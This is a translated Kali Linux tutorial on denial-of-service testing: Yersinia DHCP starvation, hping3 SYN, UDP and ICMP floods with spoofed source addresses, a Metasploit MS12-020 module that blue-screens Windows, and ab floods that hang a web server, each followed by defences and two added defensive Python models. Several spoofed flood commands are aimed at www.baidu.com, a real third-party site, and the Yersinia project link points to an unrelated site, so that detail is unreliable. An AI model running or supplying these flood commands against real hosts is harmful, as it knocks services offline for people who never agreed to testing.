Kali Linux penetration testing: DoS attacks and defense
As penetration testers, we sometimes need to test a customer's systems against DDoS attacks, and for that we need a suitable testing tool. Kali Linux integrates several DDoS testing tools; the following describes some of them.
Denial-of-service attacks under Kali:
1. D(D)oS
2. Yersinia
3. Hping3
4. Using Metasploit for SYN flood attacks
5. Web DoS (stress testing)
1. DoS (DDoS)
A denial-of-service attack is used by attackers to stop the target machine from providing its services.
Common approaches include:
consuming bandwidth, CPU, and memory resources (the various flood attacks);
prolonging server response time;
exploiting service vulnerabilities to attack the service;
IP spoofing.
2. Yersinia
Project address: http://vip.2cto.com. Yersinia is an attack and intrusion-detection tool for low-level network protocols and supports a range of protocol attacks.
For example, it can seize the root bridge role of the Spanning Tree Protocol (STP), generate virtual CDP (Cisco Discovery Protocol) neighbours, become the active router in an HSRP (Hot Standby Router Protocol) virtual group, forge DHCP responses, and carry out other low-level attacks.
The graphical attack interface is generally used.
Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
-V: version information
-h: help
-G: graphical (GTK) interface
-I: interactive (ncurses) mode
-D: daemon (background) mode
-d: debugging
-l logfile: select a log file
-c conffile: select the configuration file
Protocols that can be attacked: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.
Start the graphical interface with: yersinia -G
Case: attack test against a DHCP service
DHCP server: Windows Server 2003, IP address 192.168.10.10
Kali Linux IP: 192.168.10.100
First, let's look at how DHCP hands out IP addresses.
Step 1: Start the DHCP server
On the DHCP server (Windows Server 2003), the allowed IP address range is 192.168.10.100-200.
Kali has already leased 192.168.10.100.
Step 2: Start the yersinia attack program
Select the corresponding NIC interface in yersinia.
Yersinia offers four DHCP attack modes:
Sending RAW packet # send a raw packet
Sending DISCOVER packet # send DHCP DISCOVER requests for IP addresses, occupying all addresses in the pool and causing a DoS
Creating DHCP rogue server # create a false DHCP server that clients connect to, so the real DHCP server cannot serve them
Sending RELEASE packet # send RELEASE requests to the DHCP server, invalidating all IP addresses in use
DHCP DISCOVER attack test
Once the DHCP server is under the DISCOVER attack, all valid IP addresses in the address pool are exhausted and new users cannot obtain IP addresses.
Note: although all IP addresses are occupied, they are not displayed in the DHCP address pool.
Step 3: Verify the attack results
If a Windows XP client now tries to obtain an IP address, the request fails.
So our DHCP DISCOVER attack has taken effect!!!
Defense solution:
Enable DHCP snooping on the switch and define trusted and untrusted ports. By default, all switch ports are untrusted. Untrusted port: the port that connects to end devices. Clients may only send DHCP request packets through it; all other DHCP packets (such as DHCP OFFER) arriving on the port are discarded. Trusted port: connects to a legitimate DHCP server or an aggregation interface, and forwards and receives all DHCP packets.
Enable DHCP snooping on the switch:
Switch(config)# ip dhcp snooping
Set the VLAN on which DHCP snooping acts:
Switch(config)# ip dhcp snooping vlan <number>
Configure a port as trusted (ports are untrusted by default):
Switch(config-if)# ip dhcp snooping trust
Insert option 82 information into messages:
Switch(config)# ip dhcp snooping information option
Limit the DHCP packet rate on a port to mitigate DHCP pool exhaustion attacks:
Switch(config-if)# ip dhcp snooping limit rate <rate>
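As an added example (not from the original tutorial or from the yersinia project), the Python model below applies the snooping policy just described to constructed DHCP events: server messages arriving on untrusted ports are dropped, client messages are rate-limited per port, and a port that exceeds the limit is err-disabled, as `ip dhcp snooping limit rate` does on the switch. The port names, MAC addresses and the rate value are assumptions.

```python
from collections import defaultdict, deque

SERVER_MSGS = {"OFFER", "ACK", "NAK"}                   # only a DHCP server sends these
CLIENT_MSGS = {"DISCOVER", "REQUEST", "RELEASE", "DECLINE"}


class DhcpSnooper:
    """Per-port DHCP snooping state: trusted ports, a rate limiter and err-disabled ports."""

    def __init__(self, trusted_ports, limit_rate, window=1.0):
        self.trusted = set(trusted_ports)
        self.limit_rate = limit_rate          # client DHCP packets allowed per port per window
        self.window = window                  # seconds
        self.recent = defaultdict(deque)      # port -> timestamps of recent client packets
        self.err_disabled = set()

    def handle(self, port, msg, mac, ts):
        """Return FORWARD, DROP or ERRDISABLE for one DHCP packet (mac is kept for logging)."""
        if port in self.err_disabled:
            return "DROP"
        if port in self.trusted:
            return "FORWARD"                  # trusted uplink/server port: everything passes
        if msg in SERVER_MSGS:
            return "DROP"                     # OFFER/ACK from an access port = rogue server
        if msg not in CLIENT_MSGS:
            return "DROP"
        q = self.recent[port]
        q.append(ts)
        while q and ts - q[0] > self.window:  # slide the window
            q.popleft()
        if len(q) > self.limit_rate:          # DISCOVER storm with changing MACs: starvation
            self.err_disabled.add(port)
            return "ERRDISABLE"
        return "FORWARD"


def run_events(events, trusted_ports, limit_rate):
    """Apply the policy to a list of (port, msg, mac, ts) tuples and return the verdicts."""
    snooper = DhcpSnooper(trusted_ports, limit_rate)
    return [snooper.handle(*ev) for ev in events]


# Constructed sample traffic: a legitimate server on the trusted uplink, one normal
# client, a rogue server on an access port, and 40 DISCOVERs with spoofed MACs on Gi0/5.
SAMPLE_EVENTS = [
    ("Gi0/24", "OFFER", "00:0c:29:aa:bb:01", 0.00),
    ("Gi0/2", "DISCOVER", "00:1a:2b:3c:4d:5e", 0.10),
    ("Gi0/3", "OFFER", "de:ad:be:ef:00:01", 0.20),
] + [("Gi0/5", "DISCOVER", "02:00:00:00:00:%02x" % i, 0.30 + i * 0.001) for i in range(40)]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, run_events(SAMPLE_EVENTS, {"Gi0/24"}, 15)):
        print("%-6s %-8s %-17s %s" % (ev[0], ev[1], ev[2], verdict))
```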
3. Hping3
A TCP/IP packet assembly and analysis tool.
Supports multiple protocols (ICMP, TCP, UDP, raw IP, etc.)
Runs on multiple operating systems (Linux, FreeBSD, NetBSD, OpenBSD, Solaris, Mac OS X, Windows)
It can be used for firewall testing, port scanning, operating system fingerprinting, and network inspection.
Usage:
-h --help: display help
-v --version: display the hping version
-c --count: number of packets to send
-i --interval: interval between packets; uX means X microseconds (for example -i u1000)
--fast: alias for -i u10000, i.e. 10 packets per second
-n --numeric: numeric output only
-q --quiet: quiet mode
-I --interface: interface to use; if the host has two NICs, this selects which one sends the packets (by default the interface of the default gateway)
-V --verbose: verbose mode
-D --debug: debugging information
-z --bind: bind ctrl+z to the TTL (by default it is bound to the destination port)
-Z --unbind: unbind ctrl+z
Mode: the default mode is TCP
-0 --rawip: raw IP mode
-1 --icmp: ICMP mode
-2 --udp: UDP mode
-8 --scan: scan mode, for example hping3 --scan 1-30,70-90 -S www.target.host
-9 --listen: listen mode
IP options:
-a --spoof: spoof the source address
--rand-dest: random destination address mode
--rand-source: random source address mode
-t --ttl: TTL value (default 64)
-N --id: IP id (default random)
-W --winid: use the win* id byte ordering
-r --rel: relative id field
-f --frag: split packets into fragments (may pass weak ACLs (access control lists))
-x --morefrag: set the more-fragments flag
-y --dontfrag: set the don't-fragment flag
-g --fragoff: set the fragment offset
-m --mtu: set a virtual MTU; packets larger than it are fragmented as with --frag
-o --tos: type of service (default 0x00); --tos help lists the values
-G --rroute: include the RECORD_ROUTE option and display the route buffer
--lsrr: loose source route record
--ssrr: strict source route record
-H --ipproto: set the IP protocol field (raw IP mode only)
ICMP options:
-C --icmptype: ICMP type (default echo request)
-K --icmpcode: ICMP code (default 0)
--force-icmp: send all ICMP types (by default only supported types are sent)
--icmp-gw: gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts: alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr: alias for --icmp --icmptype 17 (ICMP address mask)
--icmp-help: display the other ICMP help options
UDP/TCP options:
-s --baseport: base source port (default random)
-p --destport: destination port (default 0); multiple ports can be specified
-k --keep: keep the source port fixed
-w --win: window size (default 64)
-O --tcpoff: set a fake TCP data offset
-Q --seqnum: show only TCP sequence numbers
-b --badcksum: try to send packets with a bad IP checksum; many systems fix the IP checksum when sending, so you get a bad UDP/TCP checksum instead
-M --setseq: set the TCP sequence number
-L --setack: set the TCP ack number
-F --fin: set the FIN flag
-S --syn: set the SYN flag
-R --rst: set the RST flag
-P --push: set the PUSH flag
-A --ack: set the ACK flag
-U --urg: set the URG flag
-X --xmas: set the X unused flag (0x40)
-Y --ymas: set the Y unused flag (0x80)
--tcpexitcode: use the last tcp->th_flags as the exit code
--tcp-timestamp: enable the TCP timestamp option to guess the remote uptime
Common options:
-d --data: data size (default 0)
-E --file: read data from the specified file
-e --sign: add a signature
-j --dump: dump packets in hex
-J --print: dump printable characters
-B --safe: enable the safe protocol
-u --end: when --file reaches the end of the file, stop instead of starting again from the beginning
-T --traceroute: traceroute mode
--tr-stop: exit when the first non-ICMP packet is received in traceroute mode
--tr-keep-ttl: keep the source TTL fixed, useful for monitoring a single hop
--tr-no-rtt: do not calculate or show RTT information in traceroute mode
ARS packet description (newly added, not yet stable):
--apd-send: send the packet described with APD
Usage:
hping3 -S -a 1.1.1.1 --flood -V www.xxx.com
hping3 -S -P -U --flood -V --rand-source www.xxx.com
hping3 -c 100000 -d 120 -S -w 64 -p 80 --flood --rand-source www.xxx.com
hping3 -q -n -a 1.1.1.1 -S -s 53 --keep -p 22 --flood www.xxx.com (SYN flood)
hping3 -q -n -a 1.1.1.1 -SARFU -p 80 -i u10000 www.xxx.com (TCP connect flood)
hping3 -q -n -a 1.1.1.1 -SARFU -p 22 --flood www.xxx.com (TCP connect flood)
hping3 -q -n -a 1.1.1.1 --udp -s 53 --keep -p 68 --flood www.xxx.com (UDP flood)
hping3 -q -n -a 1.1.1.1 --id 0 --icmp -d 56 --flood www.xxx.com (ICMP flood)
Test description:
A) hping3 -S -a 1.1.1.1 -V www.baidu.com # send SYN packets with the forged source IP address 1.1.1.1
-a: forged source IP address
-V: verbose mode
-S: send SYN packets
--flood: only send packets, ignoring any replies
Start a Wireshark capture to check whether the forged IP 1.1.1.1 takes effect:
Select the capture function and choose the network card to listen on.
Click start to capture packets.
The captured data shows that the packet source is successfully forged and that packets are sent out continuously.
B) hping3 -S -V --flood --rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-c 10000: number of packets to send
-d 150: size of each packet sent
-w 64: TCP window size
-p 80: target port of the attack, which can be set freely
--rand-source: use random source IP addresses
Wireshark shows more than 20 million packets sent in less than one minute.
C) hping3 -SARFU -V --flood --rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-SARFU: set the SYN, ACK, RST, FIN and URG flags together in each packet (see the TCP flag options above)
Defense solution:
Ensure adequate bandwidth;
Use high-performance network devices;
Scrub and filter abnormal traffic;
Distributed defense;
Anti-DDoS devices;
4. DoS attacks using system vulnerabilities
Scan for machines with port 445 or 3389 open
Exploit the MS12-020 vulnerability
Use Metasploit for the attacks
Use Metasploit for SYN flood attacks:
use auxiliary/dos/tcp/synflood
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
......
Test case:
Kali Linux host IP: 192.168.10.3
Windows Server 2003 test machine IP address: 192.168.10.10
A Windows RDP SYN flood experiment:
Start msfconsole on Kali.
Use the search function in msfconsole to find the integrated DoS modules.
Test a Windows RDP attack:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Set the IP address of the target host and run the module.
If the attack succeeds, "seems down" is displayed (the PC is over).
Now we can see that the target's screen is blue.
OK!!!
Defense solution:
Promptly update system patches;
Use the Client Firewall;
5. Web DoS (stress testing)
Website performance stress testing is an essential part of performance tuning.
Only when the server is under high load are the problems caused by its various settings truly exposed.
The ab command creates many concurrent access threads to simulate multiple visitors accessing a URL at the same time.
It is URL-based, so it can be used to test the load capacity of Apache,
and also to load-test other web servers such as nginx, lighttpd, Tomcat, and IIS.
The ab command places very low demands on the computer that generates the load: it uses neither much CPU nor much memory,
but it places a heavy load on the target server. The principle is similar to a CC attack.
However, you must also be careful when testing; otherwise, too much load at once may crash the target server through resource exhaustion or cause other serious problems.
Usage:
-n requests: number of requests to perform in the test session (the total number of visits to the page in this test); by default only one request is executed
-c concurrency: number of requests to make at a time (the concurrency level); the default is one at a time
-t timelimit: maximum number of seconds to wait for responses; implies -n 50000 and limits the test to a fixed total time (no time limit by default)
-p postfile: file containing data to POST, in the form "p1=1&p2=2", e.g. -p 111.txt (use with -T)
-T content-type: Content-type header to use for POSTing, e.g. -T "application/x-www-form-urlencoded" (use with -p)
-v verbosity: how much troubleshooting info to print; 4 or greater shows the headers, 3 or greater shows the response codes (404, 200, etc.), 2 or greater shows warnings and other information
-V: print the version number and exit
-w: print results in HTML tables (by default a two-column table on a white background)
-i: use HEAD instead of GET
-x attributes: string to insert as table attributes
-y attributes: string to insert as tr attributes
-z attributes: string to insert as td or th attributes
-C attribute: add a cookie, e.g. -C "c1=1234,c2=2,c3=3" (repeatable); the typical form is name=value pairs separated by commas
Tip: using the session mechanism, you can pass the JSESSIONID cookie to keep the session, e.g. -C "c1=1234,c2=2,c3=3,JSESSIONID=ff056cd16da9d71cb1_c1d56f0319f8".
-H attribute: add an arbitrary header line, e.g. 'Accept-Encoding: gzip', inserted after all normal header lines (repeatable)
-A attribute: add Basic WWW authentication; the attribute is a colon-separated username and password
-P attribute: add Basic proxy authentication (proxy-auth-username:password); the pair is sent base64-encoded regardless of whether the server asks for it with a 401 response
-X proxy:port: proxy server and port number to use
-k: use the HTTP KeepAlive feature
-d: do not show the percentiles served table
-S: do not show confidence estimators and warnings
-g filename: output the collected data to a gnuplot-format file
-e filename: output a CSV file with the percentages served
-h: display usage information
Known limitations (ab's own bug list): the program has various statically declared fixed-length buffers; its parsing of command line arguments, server response headers and other external input is simplistic, which may have adverse consequences; it does not fully implement HTTP/1.x and only accepts some 'previewed' response formats; and its frequent use of strstr(3) may cause performance problems, meaning you may be measuring the performance of ab rather than of the server.
There are many parameters, but for ordinary stress testing only -n and -c are usually needed.
ab -n 10000 -c 1000 http://192.168.10.4
root@kali:~# ab -n 1000 -c 100 http://192.168.10.4/wp-login.php
This is ApacheBench, Version 2.3
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Licensed to The Apache Software Foundation, http://www.apache.org/
Benchmarking 192.168.10.4 (be patient)
Completed 100 requests
Completed 200 requests
Completed 300 requests
^C (the web server gets stuck after 300 requests, stops responding, and the test is terminated)
Server Software:        Apache
Server Hostname:        192.168.10.4
Server Port:            80
Document Path:          /wp-login.php # test page
Document Length:        3192 bytes # page size
Concurrency Level:      100 # number of concurrent requests
Time taken for tests:   36.861 seconds # test duration
Complete requests:      321 # number of completed requests
Failed requests:        0 # number of failed requests
Write errors:           0
Total transferred:      1137945 bytes
HTML transferred:       1024632 bytes
Requests per second:    8.71 [#/sec] (mean) # an important indicator, equivalent to transactions per second in LR
Time per request:       11483.128 [ms] (mean) # an important indicator, equivalent to the average transaction response time in LR
Time per request:       114.831 [ms] (mean, across all concurrent requests) # actual run time of each connection request
Transfer rate:          30.15 [Kbytes/sec] received
Connection Times (ms)
              min  mean[+/-sd] median   max
Connect:        0    6    8.7      2      37
Processing:   179 2934 2131.5   2559   24266
Waiting:      179 2921 2130.6   2548
Total:        211 2940 2127.5   2560
Percentage of the requests served within a certain time (ms)
  50%   2560 (50% of requests served within 2560 ms)
  66%   3124
  75%   3553
  80%   3892
  90%   5169 (90% of requests served within 5169 ms)
  95%   5898
  98%   8080
  99%   8535 (99% of requests served within 8535 ms)
 100%  24266 (longest request)
Here we can see that as a large number of packets are sent, the connection response time keeps increasing and the DoS effect begins to appear.
netstat -atupln | grep 80 | wc -l
I wanted to count the port 80 connections, but the server hung before the count could even start, which proves that the test was effective.
Note: because the maximum number of web connections allowed is 200, it hangs quickly.
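Counting sockets the way the netstat line above does is the quickest way to tell the two flood types on this page apart: an hping3 --rand-source SYN flood (section 3) shows up as many SYN_RECV sockets from different peers, while an ab run shows a single client holding many ESTABLISHED connections. The Python triage below is an added example, not from the original post; the netstat snapshot it parses is constructed and the thresholds are assumptions.

```python
import re
from collections import Counter

# Column layout of `netstat -atupln`: proto recv-q send-q local remote [state] pid/program
LINE_RE = re.compile(r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)"
                     r"(?:\s+(?P<state>[A-Z_]+))?")


def parse_netstat(text):
    """Return one dict per socket line; header and unrelated lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def triage(text, port=80, syn_threshold=20, per_ip_threshold=10):
    """Summarise sockets on `port` and flag SYN-flood and per-IP connection-flood patterns."""
    rows = [r for r in parse_netstat(text) if r["local"].endswith(":%d" % port)]
    syn_recv = [r for r in rows if r["state"] == "SYN_RECV"]
    syn_sources = {r["remote"].rsplit(":", 1)[0] for r in syn_recv}
    per_ip = Counter(r["remote"].rsplit(":", 1)[0] for r in rows if r["state"] == "ESTABLISHED")
    findings = []
    if len(syn_recv) >= syn_threshold:
        # hping3 --rand-source leaves almost every half-open socket with a different peer,
        # so blocking individual sources does not help; SYN cookies / upstream scrubbing do.
        randomised = len(syn_sources) >= 0.9 * len(syn_recv)
        findings.append("SYN flood: %d half-open sockets from %d sources%s" % (
            len(syn_recv), len(syn_sources), " (randomised sources)" if randomised else ""))
    for ip, n in per_ip.most_common():
        if n >= per_ip_threshold:     # ab -c 100 style: one client holding many connections
            findings.append("connection flood: %s holds %d established connections" % (ip, n))
    return {"total": len(rows), "syn_recv": len(syn_recv), "syn_sources": len(syn_sources),
            "per_ip": per_ip, "findings": findings}


def _sock(local, remote, state, prog="-"):
    """Format one line the way netstat prints it (used only to build the sample below)."""
    return "tcp        0      0 %-23s %-23s %-11s %s" % (local, remote, state, prog)


# Constructed snapshot for the web server 192.168.10.4: one ab-style client holding 25
# connections and 30 half-open sockets from random-looking sources, plus normal sockets.
SAMPLE_NETSTAT = "\n".join(
    ["Active Internet connections (servers and established)",
     "Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name",
     _sock("0.0.0.0:80", "0.0.0.0:*", "LISTEN", "1234/apache2"),
     _sock("192.168.10.4:22", "192.168.10.50:50110", "ESTABLISHED", "987/sshd")]
    + [_sock("192.168.10.4:80", "192.168.10.3:%d" % (41000 + i), "ESTABLISHED", "1234/apache2")
       for i in range(25)]
    + [_sock("192.168.10.4:80", "10.%d.%d.%d:53" % (i % 7, i * 3 % 251, i * 11 % 253), "SYN_RECV")
       for i in range(30)])

if __name__ == "__main__":
    for finding in triage(SAMPLE_NETSTAT)["findings"]:
        print(finding)
```

On a live host, feed it the output of `netstat -atupln` (or `ss -tan`, adjusting the regex) instead of the constructed snapshot.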
Defense solution:
Optimize application code performance: make rational use of memcache;
Optimize the network architecture: load balancing and traffic distribution;
Countermeasures: limit the request frequency of each IP address, use CAPTCHAs, and limit the size of each packet;
Configure the web server's Timeout and KeepAliveTimeout sensibly;
Use a web application firewall;
Serve the website as static pages;
NOTICE: This experiment is for reference purposes only !!!